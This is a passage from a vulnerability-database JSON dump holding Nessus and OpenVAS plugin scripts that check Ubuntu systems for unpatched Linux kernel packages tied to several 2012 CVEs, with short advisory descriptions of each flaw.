unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-01T00:00:00", "id": "UBUNTU_USN-1568-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62112", "published": "2012-09-15T00:00:00", "title": "Ubuntu 11.10 : linux vulnerabilities (USN-1568-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1568-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62112);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/12/01 13:19:07\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\");\n script_bugtraq_id(54702, 54763);\n script_xref(name:\"USN\", value:\"1568-1\");\n\n script_name(english:\"Ubuntu 11.10 : linux vulnerabilities (USN-1568-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1568-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.0-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-26-generic\", pkgver:\"3.0.0-26.42\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-26-generic-pae\", pkgver:\"3.0.0-26.42\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-26-server\", pkgver:\"3.0.0-26.42\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"linux-image-3.0.0-26-virtual\", pkgver:\"3.0.0-26.42\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.0-generic / linux-image-3.0-generic-pae / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:17:41", "bulletinFamily": "scanner", "description": "Ben Hutchings reported a flaw in the Linux kernel with some network drivers that support TSO (TCP segment offload). A local or peer user could exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel implementation of RDS sockets. A local unprivileged user could potentially use this flaw to read privileged information from the kernel. (CVE-2012-3430)", "modified": "2016-12-01T00:00:00", "id": "UBUNTU_USN-1580-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=62241", "published": "2012-09-24T00:00:00", "title": "USN-1580-1 : linux-ti-omap4 vulnerabilities", "type": "nessus", "sourceData": "# This script was automatically generated from Ubuntu Security\n# Notice USN-1580-1. It is released under the Nessus Script \n# Licence.\n#\n# Ubuntu Security Notices are (C) Canonical, Inc.\n# See http://www.ubuntu.com/usn/\n# Ubuntu(R) is a registered trademark of Canonical, Inc.\n\nif (!defined_func(\"bn_random\")) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(62241);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2016/12/01 20:56:51 $\");\n\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\");\n script_xref(name:\"USN\", value:\"1580-1\");\n\n script_name(english:\"USN-1580-1 : linux-ti-omap4 vulnerabilities\");\n script_summary(english:\"Checks dpkg output for updated package(s)\");\n\n script_set_attribute(attribute:\"synopsis\", value: \n\"The remote Ubuntu host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"Ben Hutchings reported a flaw in the Linux kernel with some network\ndrivers that support TSO (TCP segment offload). A local or peer user\ncould exploit this flaw to to cause a denial of service.\n(CVE-2012-3412)\n\nJay Fenlason and Doug Ledford discovered a bug in the Linux kernel\nimplementation of RDS sockets. A local unprivileged user could\npotentially use this flaw to read privileged information from the\nkernel. (CVE-2012-3430)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.ubuntu.com/usn/usn-1580-1/\");\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package(s).\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/21\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/24\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(\"Ubuntu Security Notice (C) 2012 Canonical, Inc. / NASL script (C) 2012-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude(\"ubuntu.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/Ubuntu/release\")) exit(0, \"The host is not running Ubuntu.\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) exit(1, \"Could not obtain the list of installed packages.\");\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-1419-omap4\", pkgver:\"3.2.0-1419.26\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:ubuntu_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-12-04T11:19:54", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1567-1", "modified": "2017-12-01T00:00:00", "published": "2012-09-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=841147", "id": "OPENVAS:841147", "title": "Ubuntu Update for linux USN-1567-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1567_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for linux USN-1567-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A flaw was found in how the Linux kernel passed the replacement session\n keyring to a child process. An unprivileged local user could exploit this\n flaw to cause a denial of service (panic). (CVE-2012-2745)\n\n Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n \n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n \n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1567-1\";\ntag_affected = \"linux on Ubuntu 11.04\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1567-1/\");\n script_id(841147);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-17 16:55:00 +0530 (Mon, 17 Sep 2012)\");\n script_cve_id(\"CVE-2012-2745\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1567-1\");\n script_name(\"Ubuntu Update for linux USN-1567-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic-pae\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-omap\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-powerpc\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-powerpc-smp\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-powerpc64-smp\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-server\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-versatile\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-virtual\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:35", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1574-1", "modified": "2018-08-17T00:00:00", "published": "2012-09-22T00:00:00", "id": "OPENVAS:1361412562310841150", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841150", "title": "Ubuntu Update for linux-lts-backport-natty USN-1574-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1574_1.nasl 11037 2018-08-17 11:51:16Z cfischer $\n#\n# Ubuntu Update for linux-lts-backport-natty USN-1574-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\n\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1574-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841150\");\n script_version(\"$Revision: 11037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-17 13:51:16 +0200 (Fri, 17 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:18 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-2745\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1574-1\");\n script_name(\"Ubuntu Update for linux-lts-backport-natty USN-1574-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU10\\.04 LTS\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1574-1\");\n script_tag(name:\"affected\", value:\"linux-lts-backport-natty on Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A flaw was found in how the Linux kernel passed the replacement session\n keyring to a child process. An unprivileged local user could exploit this\n flaw to cause a denial of service (panic). (CVE-2012-2745)\n\n Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n\n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic-pae\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-server\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-virtual\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:18", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1567-1", "modified": "2018-08-17T00:00:00", "published": "2012-09-17T00:00:00", "id": "OPENVAS:1361412562310841147", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841147", "title": "Ubuntu Update for linux USN-1567-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1567_1.nasl 11037 2018-08-17 11:51:16Z cfischer $\n#\n# Ubuntu Update for linux USN-1567-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\n\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1567-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841147\");\n script_version(\"$Revision: 11037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-17 13:51:16 +0200 (Fri, 17 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-17 16:55:00 +0530 (Mon, 17 Sep 2012)\");\n script_cve_id(\"CVE-2012-2745\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1567-1\");\n script_name(\"Ubuntu Update for linux USN-1567-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU11\\.04\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1567-1\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 11.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A flaw was found in how the Linux kernel passed the replacement session\n keyring to a child process. An unprivileged local user could exploit this\n flaw to cause a denial of service (panic). (CVE-2012-2745)\n\n Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n\n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic-pae\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-omap\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-powerpc\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-powerpc-smp\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-powerpc64-smp\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-server\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-versatile\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-virtual\", ver:\"2.6.38-16.67\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:20:36", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1574-1", "modified": "2017-12-01T00:00:00", "published": "2012-09-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=841150", "id": "OPENVAS:841150", "title": "Ubuntu Update for linux-lts-backport-natty USN-1574-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1574_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for linux-lts-backport-natty USN-1574-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A flaw was found in how the Linux kernel passed the replacement session\n keyring to a child process. An unprivileged local user could exploit this\n flaw to cause a denial of service (panic). (CVE-2012-2745)\n\n Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n \n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n \n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1574-1\";\ntag_affected = \"linux-lts-backport-natty on Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1574-1/\");\n script_id(841150);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:18 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-2745\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1574-1\");\n script_name(\"Ubuntu Update for linux-lts-backport-natty USN-1574-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = 